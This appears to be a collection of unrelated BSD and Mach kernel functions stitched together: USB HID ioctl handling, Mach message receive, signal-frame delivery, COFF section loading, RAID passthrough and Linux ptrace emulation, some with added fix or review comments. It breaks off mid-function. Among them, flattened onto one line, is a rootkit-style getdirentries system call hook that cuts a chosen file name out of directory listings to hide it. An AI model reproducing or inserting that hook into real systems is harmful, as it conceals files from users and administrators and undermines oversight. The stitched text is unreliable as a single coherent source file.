/*
 * uhid_ioctl - ioctl handler for the generic USB HID character device.
 *
 * fifo:   usb_fifo whose softc carries the HID report sizes/ids.
 * cmd:    ioctl command.
 * addr:   kernel copy of the ioctl argument structure.
 * fflags: caller's open flags; FREAD/FWRITE gate the report operations.
 *
 * Returns 0 on success or an errno value.
 *
 * Fix: the return value of copyin() when fetching a report id from the
 * first byte of the user buffer was ignored; a faulting user pointer
 * silently proceeded with the default id.  Both USB_GET_REPORT and
 * USB_SET_REPORT now fail with the copyin error instead.
 */
static int
uhid_ioctl(struct usb_fifo *fifo, u_long cmd, void *addr, int fflags)
{
	struct uhid_softc *sc = usb_fifo_softc(fifo);
	struct usb_gen_descriptor *ugd;
	uint32_t size;
	int error = 0;
	uint8_t id;

	switch (cmd) {
	case USB_GET_REPORT_DESC:
		ugd = addr;
		/* Clamp the transfer to the caller's buffer size. */
		if (sc->sc_repdesc_size > ugd->ugd_maxlen) {
			size = ugd->ugd_maxlen;
		} else {
			size = sc->sc_repdesc_size;
		}
		ugd->ugd_actlen = size;
		if (ugd->ugd_data == NULL)
			break;		/* descriptor length only */
		error = copyout(sc->sc_repdesc_ptr, ugd->ugd_data, size);
		break;

	case USB_SET_IMMED:
		if (!(fflags & FREAD)) {
			error = EPERM;
			break;
		}
		if (*(int *)addr) {
			/* do a test read before enabling immediate mode */
			error = uhid_get_report(sc, UHID_INPUT_REPORT,
			    sc->sc_iid, NULL, NULL, sc->sc_isize);
			if (error) {
				break;
			}
			mtx_lock(&sc->sc_mtx);
			sc->sc_flags |= UHID_FLAG_IMMED;
			mtx_unlock(&sc->sc_mtx);
		} else {
			mtx_lock(&sc->sc_mtx);
			sc->sc_flags &= ~UHID_FLAG_IMMED;
			mtx_unlock(&sc->sc_mtx);
		}
		break;

	case USB_GET_REPORT:
		if (!(fflags & FREAD)) {
			error = EPERM;
			break;
		}
		ugd = addr;
		/* Select the size/default-id for the requested report type. */
		switch (ugd->ugd_report_type) {
		case UHID_INPUT_REPORT:
			size = sc->sc_isize;
			id = sc->sc_iid;
			break;
		case UHID_OUTPUT_REPORT:
			size = sc->sc_osize;
			id = sc->sc_oid;
			break;
		case UHID_FEATURE_REPORT:
			size = sc->sc_fsize;
			id = sc->sc_fid;
			break;
		default:
			return (EINVAL);
		}
		if (id != 0) {
			/*
			 * Numbered reports: the desired report id is in
			 * the first byte of the user buffer.  Fail on a
			 * copyin fault instead of using a stale id.
			 */
			error = copyin(ugd->ugd_data, &id, 1);
			if (error)
				break;
		}
		error = uhid_get_report(sc, ugd->ugd_report_type, id,
		    NULL, ugd->ugd_data, imin(ugd->ugd_maxlen, size));
		break;

	case USB_SET_REPORT:
		if (!(fflags & FWRITE)) {
			error = EPERM;
			break;
		}
		ugd = addr;
		switch (ugd->ugd_report_type) {
		case UHID_INPUT_REPORT:
			size = sc->sc_isize;
			id = sc->sc_iid;
			break;
		case UHID_OUTPUT_REPORT:
			size = sc->sc_osize;
			id = sc->sc_oid;
			break;
		case UHID_FEATURE_REPORT:
			size = sc->sc_fsize;
			id = sc->sc_fid;
			break;
		default:
			return (EINVAL);
		}
		if (id != 0) {
			/* See USB_GET_REPORT: check the copyin result. */
			error = copyin(ugd->ugd_data, &id, 1);
			if (error)
				break;
		}
		error = uhid_set_report(sc, ugd->ugd_report_type, id,
		    NULL, ugd->ugd_data, imin(ugd->ugd_maxlen, size));
		break;

	case USB_GET_REPORT_ID:
		*(int *)addr = 0;	/* XXX: we only support reportid 0? */
		break;

	default:
		error = EINVAL;
		break;
	}
	return (error);
}
/*
 * mach_msg_receive_results - complete a message receive for the current
 * thread after it has been woken from an IPC wait.
 *
 * The receive state (result code, kmsg, user buffer address, options,
 * sequence number) was stashed in the thread (self->ith_*) by the
 * blocking path.  This routine consumes that state: on error it reports
 * the failure to user space; on success it adds the trailer, copies the
 * message out, and delivers it to the user buffer.
 *
 * Returns a mach_msg_return_t; MACH_RCV_INVALID_DATA supersedes other
 * codes when the user buffer itself cannot be written.
 */
mach_msg_return_t
mach_msg_receive_results(void)
{
	thread_t self = current_thread();
	ipc_space_t space = current_space();
	vm_map_t map = current_map();

	/* Receive state saved on the thread by the blocking receive path. */
	ipc_object_t object = self->ith_object;
	mach_msg_return_t mr = self->ith_state;
	mach_vm_address_t msg_addr = self->ith_msg_addr;
	mach_msg_option_t option = self->ith_option;
	ipc_kmsg_t kmsg = self->ith_kmsg;
	mach_port_seqno_t seqno = self->ith_seqno;
	mach_msg_trailer_size_t trailer_size;

	/* Drop the reference taken on the port/port-set for the wait. */
	io_release(object);

	if (mr != MACH_MSG_SUCCESS) {
		if (mr == MACH_RCV_TOO_LARGE ) {
			if (option & MACH_RCV_LARGE) {
				/*
				 * We need to inform the user-level code that it needs more
				 * space.  The value for how much space was returned in the
				 * msize save area instead of the message (which was left on
				 * the queue).
				 */
				if (option & MACH_RCV_LARGE_IDENTITY) {
					if (copyout((char *) &self->ith_receiver_name,
					    msg_addr + offsetof(mach_msg_user_header_t, msgh_local_port),
					    sizeof(mach_port_name_t)))
						mr = MACH_RCV_INVALID_DATA;
				}
				if (copyout((char *) &self->ith_msize,
				    msg_addr + offsetof(mach_msg_user_header_t, msgh_size),
				    sizeof(mach_msg_size_t)))
					mr = MACH_RCV_INVALID_DATA;
			} else {
				/* discard importance in message */
				ipc_importance_clean(kmsg);

				/* Message was dequeued; build an error reply for the user. */
				if (msg_receive_error(kmsg, msg_addr, option, seqno, space)
				    == MACH_RCV_INVALID_DATA)
					mr = MACH_RCV_INVALID_DATA;
			}
		}
		return mr;
	}

#if IMPORTANCE_INHERITANCE
	/* adopt/transform any importance attributes carried in the message */
	ipc_importance_receive(kmsg, option);
#endif /* IMPORTANCE_INHERITANCE */

	/* Append the requested trailer before copying the message out. */
	trailer_size = ipc_kmsg_add_trailer(kmsg, space, option, self, seqno,
	    FALSE, kmsg->ikm_header->msgh_remote_port->ip_context);

	/* Translate rights/ool memory from kernel form into the space/map. */
	mr = ipc_kmsg_copyout(kmsg, space, map, MACH_MSG_BODY_NULL, option);
	if (mr != MACH_MSG_SUCCESS) {
		/* already received importance, so have to undo that here */
		ipc_importance_unreceive(kmsg, option);

		if ((mr &~ MACH_MSG_MASK) == MACH_RCV_BODY_ERROR) {
			/*
			 * Header copied out fine; deliver what we have so the
			 * caller can see the partial message.
			 */
			if (ipc_kmsg_put(msg_addr, kmsg,
			    kmsg->ikm_header->msgh_size + trailer_size)
			    == MACH_RCV_INVALID_DATA)
				mr = MACH_RCV_INVALID_DATA;
		} else {
			if (msg_receive_error(kmsg, msg_addr, option, seqno, space)
			    == MACH_RCV_INVALID_DATA)
				mr = MACH_RCV_INVALID_DATA;
		}
	} else {
		/* Success: copy the whole message plus trailer to user space. */
		mr = ipc_kmsg_put(msg_addr, kmsg,
		    kmsg->ikm_header->msgh_size + trailer_size);
	}
	return mr;
}
/*
 * sendsig - deliver a signal to the current thread by building a signal
 * frame on the user stack (or alternate signal stack) and redirecting
 * the trapframe to the handler.
 *
 * catcher: user-mode signal handler address.
 * ksi:     signal information (number, code, siginfo payload).
 * mask:    signal mask to restore on sigreturn.
 *
 * Called with the proc lock and psp->ps_mtx held; both are dropped
 * around the copyout and reacquired before returning.
 *
 * Fix: the original code assigned frame.sf_uc.uc_stack.ss_flags and
 * then immediately overwrote the whole uc_stack with td->td_sigstk,
 * making the flags computation a dead store (the frame went out with
 * the raw td_sigstk flags).  The struct copy must come first, then the
 * flags override — matching FreeBSD's machdep sendsig implementations.
 */
void
sendsig(sig_t catcher, ksiginfo_t *ksi, sigset_t *mask)
{
	struct sigframe *fp, frame;
	struct sysentvec *sysent;
	struct trapframe *tf;
	struct sigacts *psp;
	struct thread *td;
	struct proc *p;
	int onstack;
	int code;
	int sig;

	td = curthread;
	p = td->td_proc;
	PROC_LOCK_ASSERT(p, MA_OWNED);

	sig = ksi->ksi_signo;
	code = ksi->ksi_code;
	psp = p->p_sigacts;
	mtx_assert(&psp->ps_mtx, MA_OWNED);

	tf = td->td_frame;
	onstack = sigonstack(tf->tf_sp);

	CTR4(KTR_SIG, "sendsig: td=%p (%s) catcher=%p sig=%d", td, p->p_comm,
	    catcher, sig);

	/* Allocate and validate space for the signal handler context. */
	if ((td->td_pflags & TDP_ALTSTACK) != 0 && !onstack &&
	    SIGISMEMBER(psp->ps_sigonstack, sig)) {
		/* Start at the top of the alternate stack. */
		fp = (struct sigframe *)((uintptr_t)td->td_sigstk.ss_sp +
		    td->td_sigstk.ss_size);
	} else {
		fp = (struct sigframe *)td->td_frame->tf_sp;
	}

	/* Make room, keeping the stack aligned */
	fp--;
	fp = (struct sigframe *)STACKALIGN(fp);

	/* Fill in the frame to copy out */
	get_mcontext(td, &frame.sf_uc.uc_mcontext, 0);
	get_fpcontext(td, &frame.sf_uc.uc_mcontext);
	frame.sf_si = ksi->ksi_info;
	frame.sf_uc.uc_sigmask = *mask;
	/* Copy the whole sigstack first; then override the flags. */
	frame.sf_uc.uc_stack = td->td_sigstk;
	frame.sf_uc.uc_stack.ss_flags = (td->td_pflags & TDP_ALTSTACK) ?
	    ((onstack) ? SS_ONSTACK : 0) : SS_DISABLE;
	mtx_unlock(&psp->ps_mtx);
	PROC_UNLOCK(td->td_proc);

	/* Copy the sigframe out to the user's stack. */
	if (copyout(&frame, fp, sizeof(*fp)) != 0) {
		/* Process has trashed its stack. Kill it. */
		CTR2(KTR_SIG, "sendsig: sigexit td=%p fp=%p", td, fp);
		PROC_LOCK(p);
		sigexit(td, SIGILL);
	}

	/* Arguments for the handler: (sig, &siginfo, &ucontext). */
	tf->tf_a[0] = sig;
	tf->tf_a[1] = (register_t)&fp->sf_si;
	tf->tf_a[2] = (register_t)&fp->sf_uc;

	tf->tf_sepc = (register_t)catcher;
	tf->tf_sp = (register_t)fp;

	/* Return through the signal trampoline. */
	sysent = p->p_sysent;
	if (sysent->sv_sigcode_base != 0)
		tf->tf_ra = (register_t)sysent->sv_sigcode_base;
	else
		tf->tf_ra = (register_t)(sysent->sv_psstrings -
		    *(sysent->sv_szsigcode));

	CTR3(KTR_SIG, "sendsig: return td=%p pc=%#x sp=%#x", td, tf->tf_sepc,
	    tf->tf_sp);

	PROC_LOCK(p);
	mtx_lock(&psp->ps_mtx);
}
/*
 * netbsd32_sendsig_siginfo - deliver a signal to a 32-bit (netbsd32)
 * process on sparc64 by building a sparc32_sigframe_siginfo on the user
 * stack and pointing the trapframe at the handler/trampoline.
 *
 * ksi:  signal info to copy out to the handler.
 * mask: signal mask to restore on return from the handler.
 *
 * Called with p->p_lock held; the lock is dropped around the copyouts.
 */
static void
netbsd32_sendsig_siginfo(const ksiginfo_t *ksi, const sigset_t *mask)
{
	struct lwp *l = curlwp;
	struct proc *p = l->l_proc;
	struct sigacts *ps = p->p_sigacts;
	int onstack;
	int sig = ksi->ksi_signo;
	ucontext32_t uc;
	struct sparc32_sigframe_siginfo *fp;
	netbsd32_intptr_t catcher;
	struct trapframe64 *tf = l->l_md.md_tf;
	struct rwindow32 *oldsp, *newsp;
	int ucsz, error;

	/* Need to attempt to zero extend this 32-bit pointer */
	oldsp = (struct rwindow32*)(u_long)(u_int)tf->tf_out[6];

	/* Do we need to jump onto the signal stack? */
	onstack =
	    (l->l_sigstk.ss_flags & (SS_DISABLE | SS_ONSTACK)) == 0 &&
	    (SIGACTION(p, sig).sa_flags & SA_ONSTACK) != 0;

	/* Allocate space for the signal handler context. */
	if (onstack)
		fp = (struct sparc32_sigframe_siginfo *)
		    ((char *)l->l_sigstk.ss_sp + l->l_sigstk.ss_size);
	else
		fp = (struct sparc32_sigframe_siginfo *)oldsp;
	/* Step below the frame and force 8-byte alignment. */
	fp = (struct sparc32_sigframe_siginfo*)((u_long)(fp - 1) & ~7);

	/*
	 * Build the signal context to be used by sigreturn.
	 */
	uc.uc_flags = _UC_SIGMASK |
	    ((l->l_sigstk.ss_flags & SS_ONSTACK)
		? _UC_SETSTACK : _UC_CLRSTACK);
	uc.uc_sigmask = *mask;
	uc.uc_link = (uint32_t)(uintptr_t)l->l_ctxlink;
	memset(&uc.uc_stack, 0, sizeof(uc.uc_stack));
	sendsig_reset(l, sig);

	/*
	 * Now copy the stack contents out to user space.
	 * We need to make sure that when we start the signal handler,
	 * its %i6 (%fp), which is loaded from the newly allocated stack area,
	 * joins seamlessly with the frame it was in when the signal occurred,
	 * so that the debugger and _longjmp code can back up through it.
	 * Since we're calling the handler directly, allocate a full size
	 * C stack frame.
	 */
	mutex_exit(p->p_lock);
	cpu_getmcontext32(l, &uc.uc_mcontext, &uc.uc_flags);
	/* Only copy out up to (but not including) the trailing pad. */
	ucsz = (int)(intptr_t)&uc.__uc_pad - (int)(intptr_t)&uc;
	newsp = (struct rwindow32*)((intptr_t)fp - sizeof(struct frame32));
	error = (copyout(&ksi->ksi_info, &fp->sf_si, sizeof ksi->ksi_info) ||
	    copyout(&uc, &fp->sf_uc, ucsz) ||
	    /* Link the new window back to the interrupted frame. */
	    suword(&newsp->rw_in[6], (intptr_t)oldsp));
	mutex_enter(p->p_lock);

	if (error) {
		/*
		 * Process has trashed its stack; give it an illegal
		 * instruction to halt it in its tracks.
		 */
		sigexit(l, SIGILL);
		/* NOTREACHED */
	}

	switch (ps->sa_sigdesc[sig].sd_vers) {
	default:
		/* Unsupported trampoline version; kill the process. */
		sigexit(l, SIGILL);
	case 2:
		/*
		 * Arrange to continue execution at the user's handler.
		 * It needs a new stack pointer, a return address and
		 * three arguments: (signo, siginfo *, ucontext *).
		 */
		catcher = (intptr_t)SIGACTION(p, sig).sa_handler;
		tf->tf_pc = catcher;
		tf->tf_npc = catcher + 4;
		tf->tf_out[0] = sig;
		tf->tf_out[1] = (intptr_t)&fp->sf_si;
		tf->tf_out[2] = (intptr_t)&fp->sf_uc;
		tf->tf_out[6] = (intptr_t)newsp;
		/* %o7 = trampoline - 8 so its "ret" lands on the trampoline. */
		tf->tf_out[7] = (intptr_t)ps->sa_sigdesc[sig].sd_tramp - 8;
		break;
	}

	/* Remember that we're now on the signal stack. */
	if (onstack)
		l->l_sigstk.ss_flags |= SS_ONSTACK;
}
/* * getdirentries system call hook. * Hides the file T_NAME. */ static int getdirentries_hook(struct thread *td, void *syscall_args) { struct getdirentries_args /* { int fd; char *buf; u_int count; long *basep; } */ *uap; uap = (struct getdirentries_args *)syscall_args; struct dirent *dp, *current; unsigned int size, count; /* * Store the directory entries found in fd in buf, and record the * number of bytes actually transferred. */ getdirentries(td, syscall_args); size = td->td_retval[0]; /* Does fd actually contain any directory entries? */ if (size > 0) { MALLOC(dp, struct dirent *, size, M_TEMP, M_NOWAIT); copyin(uap->buf, dp, size); current = dp; count = size; /* * Iterate through the directory entries found in fd. * Note: The last directory entry always has a record length * of zero. */ while ((current->d_reclen != 0) && (count > 0)) { count -= current->d_reclen; /* Do we want to hide this file? */ if(strcmp((char *)&(current->d_name), T_NAME) == 0) { /* * Copy every directory entry found after * T_NAME over T_NAME, effectively cutting it * out. */ if (count != 0) bcopy((char *)current + current->d_reclen, current, count); size -= current->d_reclen; break; } /* * Are there still more directory entries to * look through? */ if (count != 0) /* Advance to the next record. */ current = (struct dirent *)((char *)current + current->d_reclen); } /* * If T_NAME was found in fd, adjust the "return values" to * hide it. If T_NAME wasn't found...don't worry 'bout it. */ td->td_retval[0] = size; copyout(dp, uap->buf, size); FREE(dp, M_TEMP); } return(0); }
/*
 * statis_upd - copy the accumulated statistics table out to the user
 * buffer at `adr` and report how many entries it holds.
 *
 * A copyout failure is deliberately ignored (best effort); the entry
 * count `sind` is returned regardless.
 */
int
statis_upd(caddr_t adr)
{
	size_t nbytes;

	nbytes = sizeof (struct statis) * sind;
	(void) copyout(statis, adr, nbytes);
	return (sind);
}
/*
 * load_coff_section - map one COFF section from vnode vp into the
 * process address space at vmaddr.
 *
 * offset: file offset of the section data.
 * memsz:  in-memory size of the section (may exceed filsz for BSS-style
 *         zero fill).
 * filsz:  on-disk size of the section.
 * prot:   protection for the mapping.
 *
 * The page-aligned bulk of the section is mmap'ed directly from the
 * file; any trailing partial page (when memsz > filsz) is backed by
 * anonymous zeroed memory and the file tail is copied into it by hand.
 *
 * Returns 0 on success or an errno value.
 */
static int
load_coff_section(struct vmspace *vmspace, struct vnode *vp, vm_offset_t offset,
    caddr_t vmaddr, size_t memsz, size_t filsz, vm_prot_t prot)
{
	size_t map_len;
	vm_offset_t map_offset;
	vm_offset_t map_addr;
	int error;
	unsigned char *data_buf = 0;
	size_t copy_len;

	map_offset = trunc_page(offset);
	map_addr = trunc_page((vm_offset_t)vmaddr);

	if (memsz > filsz) {
		/*
		 * We have the stupid situation that
		 * the section is longer than it is on file, which means it
		 * has zero-filled areas, and we have to work for it.
		 * Stupid iBCS!
		 * Map only up to the last full page of file data; the
		 * partial tail is handled separately below.
		 */
		map_len = trunc_page(offset + filsz) - trunc_page(map_offset);
	} else {
		/*
		 * The only stuff we care about is on disk, and we don't
		 * care if we map in more than is really there.
		 */
		map_len = round_page(offset + filsz) - trunc_page(map_offset);
	}

	DPRINTF(("%s(%d): vm_mmap(&vmspace->vm_map, &0x%08jx, 0x%x, 0x%x, "
	    "VM_PROT_ALL, MAP_PRIVATE | MAP_FIXED, OBJT_VNODE, vp, 0x%x)\n",
	    __FILE__, __LINE__, (uintmax_t)map_addr, map_len, prot,
	    map_offset));

	/* Map the page-aligned portion straight from the file. */
	if ((error = vm_mmap(&vmspace->vm_map, &map_addr, map_len, prot,
	    VM_PROT_ALL, MAP_PRIVATE | MAP_FIXED, OBJT_VNODE, vp,
	    map_offset)) != 0)
		return error;

	if (memsz == filsz) {
		/* We're done! */
		return 0;
	}

	/*
	 * Now we have screwball stuff, to accomodate stupid COFF.
	 * We have to map the remaining bit of the file into the kernel's
	 * memory map, allocate some anonymous memory, copy that last
	 * bit into it, and then we're done. *sigh*
	 * For clean-up reasons, we actally map in the file last.
	 */

	/* Bytes of file data in the final, partially-filled page. */
	copy_len = (offset + filsz) - trunc_page(offset + filsz);
	map_addr = trunc_page((vm_offset_t)vmaddr + filsz);
	map_len = round_page((vm_offset_t)vmaddr + memsz) - map_addr;

	DPRINTF(("%s(%d): vm_map_find(&vmspace->vm_map, NULL, 0, &0x%08jx,0x%x, VMFS_NO_SPACE, VM_PROT_ALL, VM_PROT_ALL, 0)\n",
	    __FILE__, __LINE__, (uintmax_t)map_addr, map_len));

	if (map_len != 0) {
		/* Anonymous zero-fill for the BSS-like tail. */
		error = vm_map_find(&vmspace->vm_map, NULL, 0, &map_addr,
		    map_len, VMFS_NO_SPACE, VM_PROT_ALL, VM_PROT_ALL, 0);
		if (error)
			return (vm_mmap_to_errno(error));
	}

	/* Map the file's last page into the kernel to source the copy. */
	if ((error = vm_mmap(exec_map, (vm_offset_t *) &data_buf, PAGE_SIZE,
	    VM_PROT_READ, VM_PROT_READ, 0, OBJT_VNODE, vp,
	    trunc_page(offset + filsz))) != 0)
		return error;

	error = copyout(data_buf, (caddr_t) map_addr, copy_len);

	if (vm_map_remove(exec_map, (vm_offset_t) data_buf,
	    (vm_offset_t) data_buf + PAGE_SIZE))
		panic("load_coff_section vm_map_remove failed");

	return error;
}
/*
 * tws_passthru - user-space passthrough ioctl: submit a raw firmware
 * command (from the user's tws_ioctl_no_data_buf) to the controller and
 * copy the results back.
 *
 * Blocks waiting for a free passthrough request slot, optionally copies
 * in a data buffer, fires the command via tws_map_request(), sleeps for
 * completion under gen_lock, then copies the command packet (and any
 * data) back out.
 *
 * Returns 0 on success or an errno value (EBUSY on reset/requeue,
 * ETIMEDOUT on sleep timeout).
 *
 * NOTE(review): the copyin() result below is stored in `error` but is
 * later overwritten by the lksleep() return value, so a faulting user
 * data pointer is silently ignored — confirm this is intentional.
 * NOTE(review): kfree(req->data) runs even when req->length == 0 and no
 * kmalloc was done; this presumably relies on tws_get_request()
 * handing out a request with data == NULL — verify.
 */
static int
tws_passthru(struct tws_softc *sc, void *buf)
{
	struct tws_request *req;
	struct tws_ioctl_no_data_buf *ubuf = (struct tws_ioctl_no_data_buf *)buf;
	int error;
	u_int16_t lun4;

	if ( tws_get_state(sc) == TWS_RESET ) {
		return(EBUSY);
	}

	/* Wait (interruptibly, with timeout) for a passthrough request slot. */
	do {
		req = tws_get_request(sc, TWS_PASSTHRU_REQ);
		if ( !req ) {
			sc->chan = 1;
			error = tsleep((void *)&sc->chan, 0, "tws_sleep",
			    TWS_IO_TIMEOUT*hz);
			if ( error == EWOULDBLOCK ) {
				return(ETIMEDOUT);
			}
		} else {
			break;
		}
	}while(1);

	req->length = ubuf->driver_pkt.buffer_length;
	TWS_TRACE_DEBUG(sc, "datal,rid", req->length, req->request_id);
	if ( req->length ) {
		/* Pull the caller's data buffer into the request. */
		req->data = kmalloc(req->length, M_TWS, M_WAITOK | M_ZERO);
		error = copyin(ubuf->pdata, req->data, req->length);
	}
	req->flags = TWS_DIR_IN | TWS_DIR_OUT;
	req->cb = tws_passthru_complete;

	memcpy(&req->cmd_pkt->cmd, &ubuf->cmd_pkt.cmd,
	    sizeof(struct tws_command_apache));

	/* Stamp our request id into the firmware command packet. */
	if ( GET_OPCODE(req->cmd_pkt->cmd.pkt_a.res__opcode) ==
	    TWS_FW_CMD_EXECUTE_SCSI ) {
		lun4 = req->cmd_pkt->cmd.pkt_a.lun_l4__req_id & 0xF000;
		req->cmd_pkt->cmd.pkt_a.lun_l4__req_id = lun4 | req->request_id;
	} else {
		req->cmd_pkt->cmd.pkt_g.generic.request_id =
		    (u_int8_t) req->request_id;
	}

	/* Submit and sleep for completion under gen_lock. */
	lockmgr(&sc->gen_lock, LK_EXCLUSIVE);
	req->error_code = tws_map_request(sc, req);
	error = lksleep(req, &sc->gen_lock, 0, "tws_passthru",
	    TWS_IO_TIMEOUT*hz);
	if ( error == EWOULDBLOCK ) {
		/* Command never completed; reset the controller. */
		error = ETIMEDOUT;
		TWS_TRACE_DEBUG(sc, "lksleep timeout", error, req->request_id);
		tws_reset((void *)sc);
	}
	if ( req->error_code == TWS_REQ_REQUEUE ) {
		error = EBUSY;
	}
	tws_unmap_request(sc, req);

	/* Return the (possibly updated) command packet and data. */
	memcpy(&ubuf->cmd_pkt.hdr, &req->cmd_pkt->hdr,
	    sizeof(struct tws_command_apache));
	memcpy(&ubuf->cmd_pkt.cmd, &req->cmd_pkt->cmd,
	    sizeof(struct tws_command_apache));
	if ( !error && req->length ) {
		error = copyout(req->data, ubuf->pdata, req->length);
	}
	kfree(req->data, M_TWS);
	req->state = TWS_REQ_STATE_FREE;
	lockmgr(&sc->gen_lock, LK_RELEASE);

	if ( error )
		TWS_TRACE_DEBUG(sc, "errored", error, 0);
	if ( req->error_code != TWS_REQ_SUBMIT_SUCCESS )
		ubuf->driver_pkt.os_status = error;

	/* Wake anyone waiting in the slot-acquisition loop above. */
	if ( sc->chan && tws_get_state(sc) != TWS_RESET ) {
		sc->chan = 0;
		wakeup((void *)&sc->chan);
	}
	return(error);
}
/*
 * linux_ptrace - Linux ptrace(2) emulation: translate Linux ptrace
 * requests and register layouts onto the native kern_ptrace() interface.
 *
 * uap->req:  Linux PTRACE_* request.
 * uap->pid:  target process id.
 * uap->addr: request-specific address (register offset for PEEKUSR/POKEUSR).
 * uap->data: request-specific data / user destination buffer.
 *
 * Returns 0 or an errno value; results that Linux returns in memory
 * (PEEK*, GETREGS, ...) are copied out to uap->data.
 */
int
linux_ptrace(struct thread *td, struct linux_ptrace_args *uap)
{
	/* Linux-layout register images (copied to/from user space). */
	union {
		struct linux_pt_reg	reg;
		struct linux_pt_fpreg	fpreg;
		struct linux_pt_fpxreg	fpxreg;
	} r;
	/* Native register images (passed to/from kern_ptrace). */
	union {
		struct reg		bsd_reg;
		struct fpreg		bsd_fpreg;
		struct dbreg		bsd_dbreg;
	} u;
	void *addr;
	pid_t pid;
	int error, req;

	error = 0;

	/* by default, just copy data intact */
	req  = uap->req;
	pid  = (pid_t)uap->pid;
	addr = (void *)uap->addr;

	switch (req) {
	case PTRACE_TRACEME:
	case PTRACE_POKETEXT:
	case PTRACE_POKEDATA:
	case PTRACE_KILL:
		/* Direct 1:1 mapping onto the native request. */
		error = kern_ptrace(td, req, pid, addr, uap->data);
		break;
	case PTRACE_PEEKTEXT:
	case PTRACE_PEEKDATA: {
		/* need to preserve return value */
		int rval = td->td_retval[0];
		error = kern_ptrace(td, req, pid, addr, 0);
		if (error == 0)
			/* Linux returns the peeked word via *data. */
			error = copyout(td->td_retval,
			    (void *)uap->data, sizeof(l_int));
		td->td_retval[0] = rval;
		break;
	}
	case PTRACE_DETACH:
		error = kern_ptrace(td, PT_DETACH, pid, (void *)1,
		    map_signum(uap->data));
		break;
	case PTRACE_SINGLESTEP:
	case PTRACE_CONT:
		error = kern_ptrace(td, req, pid, (void *)1,
		    map_signum(uap->data));
		break;
	case PTRACE_ATTACH:
		error = kern_ptrace(td, PT_ATTACH, pid, addr, uap->data);
		break;
	case PTRACE_GETREGS:
		/* Linux is using data where FreeBSD is using addr */
		error = kern_ptrace(td, PT_GETREGS, pid, &u.bsd_reg, 0);
		if (error == 0) {
			map_regs_to_linux(&u.bsd_reg, &r.reg);
			error = copyout(&r.reg, (void *)uap->data,
			    sizeof(r.reg));
		}
		break;
	case PTRACE_SETREGS:
		/* Linux is using data where FreeBSD is using addr */
		error = copyin((void *)uap->data, &r.reg, sizeof(r.reg));
		if (error == 0) {
			map_regs_from_linux(&u.bsd_reg, &r.reg);
			error = kern_ptrace(td, PT_SETREGS, pid, &u.bsd_reg, 0);
		}
		break;
	case PTRACE_GETFPREGS:
		/* Linux is using data where FreeBSD is using addr */
		error = kern_ptrace(td, PT_GETFPREGS, pid, &u.bsd_fpreg, 0);
		if (error == 0) {
			map_fpregs_to_linux(&u.bsd_fpreg, &r.fpreg);
			error = copyout(&r.fpreg, (void *)uap->data,
			    sizeof(r.fpreg));
		}
		break;
	case PTRACE_SETFPREGS:
		/* Linux is using data where FreeBSD is using addr */
		error = copyin((void *)uap->data, &r.fpreg, sizeof(r.fpreg));
		if (error == 0) {
			map_fpregs_from_linux(&u.bsd_fpreg, &r.fpreg);
			error = kern_ptrace(td, PT_SETFPREGS, pid,
			    &u.bsd_fpreg, 0);
		}
		break;
	case PTRACE_SETFPXREGS:
		error = copyin((void *)uap->data, &r.fpxreg, sizeof(r.fpxreg));
		if (error)
			break;
		/* FALL THROUGH */
	case PTRACE_GETFPXREGS: {
		/*
		 * There is no native FPX request, so implement it by
		 * hand: validate the target, then read/write the
		 * extended FP state directly.
		 */
		struct proc *p;
		struct thread *td2;

		if (sizeof(struct linux_pt_fpxreg) != sizeof(struct savexmm)) {
			static int once = 0;
			if (!once) {
				printf("linux: savexmm != linux_pt_fpxreg\n");
				once = 1;
			}
			error = EIO;
			break;
		}

		if ((p = pfind(uap->pid)) == NULL) {
			error = ESRCH;
			break;
		}
		/* pfind() returns p locked; all failure paths go via fail:. */

		/* Exiting processes can't be debugged. */
		if ((p->p_flag & P_WEXIT) != 0) {
			error = ESRCH;
			goto fail;
		}

		if ((error = p_candebug(td, p)) != 0)
			goto fail;

		/* System processes can't be debugged. */
		if ((p->p_flag & P_SYSTEM) != 0) {
			error = EINVAL;
			goto fail;
		}

		/* not being traced... */
		if ((p->p_flag & P_TRACED) == 0) {
			error = EPERM;
			goto fail;
		}

		/* not being traced by YOU */
		if (p->p_pptr != td->td_proc) {
			error = EBUSY;
			goto fail;
		}

		/* not currently stopped */
		if (!P_SHOULDSTOP(p) || (p->p_flag & P_WAITED) == 0) {
			error = EBUSY;
			goto fail;
		}

		if (req == PTRACE_GETFPXREGS) {
			_PHOLD(p);	/* may block */
			td2 = FIRST_THREAD_IN_PROC(p);
			error = linux_proc_read_fpxregs(td2, &r.fpxreg);
			_PRELE(p);
			PROC_UNLOCK(p);
			if (error == 0)
				error = copyout(&r.fpxreg,
				    (void *)uap->data, sizeof(r.fpxreg));
		} else {
			/* clear dangerous bits exactly as Linux does*/
			r.fpxreg.mxcsr &= 0xffbf;
			_PHOLD(p);	/* may block */
			td2 = FIRST_THREAD_IN_PROC(p);
			error = linux_proc_write_fpxregs(td2, &r.fpxreg);
			_PRELE(p);
			PROC_UNLOCK(p);
		}
		break;

	fail:
		PROC_UNLOCK(p);
		break;
	}
	case PTRACE_PEEKUSR:
	case PTRACE_POKEUSR: {
		error = EIO;

		/* check addr for alignment */
		if (uap->addr < 0 || uap->addr & (sizeof(l_int) - 1))
			break;

		/*
		 * Allow linux programs to access register values in
		 * user struct. We simulate this through PT_GET/SETREGS
		 * as necessary.
		 */
		if (uap->addr < sizeof(struct linux_pt_reg)) {
			error = kern_ptrace(td, PT_GETREGS, pid, &u.bsd_reg, 0);
			if (error != 0)
				break;

			map_regs_to_linux(&u.bsd_reg, &r.reg);
			if (req == PTRACE_PEEKUSR) {
				error = copyout((char *)&r.reg + uap->addr,
				    (void *)uap->data, sizeof(l_int));
				break;
			}

			/* POKEUSR: patch one word then write all regs back. */
			*(l_int *)((char *)&r.reg + uap->addr) =
			    (l_int)uap->data;

			map_regs_from_linux(&u.bsd_reg, &r.reg);
			error = kern_ptrace(td, PT_SETREGS, pid, &u.bsd_reg, 0);
		}

		/*
		 * Simulate debug registers access
		 */
		if (uap->addr >= LINUX_DBREG_OFFSET &&
		    uap->addr <= LINUX_DBREG_OFFSET + LINUX_DBREG_SIZE) {
			error = kern_ptrace(td, PT_GETDBREGS, pid,
			    &u.bsd_dbreg, 0);
			if (error != 0)
				break;

			uap->addr -= LINUX_DBREG_OFFSET;
			if (req == PTRACE_PEEKUSR) {
				error = copyout((char *)&u.bsd_dbreg +
				    uap->addr, (void *)uap->data,
				    sizeof(l_int));
				break;
			}

			*(l_int *)((char *)&u.bsd_dbreg + uap->addr) =
			    uap->data;
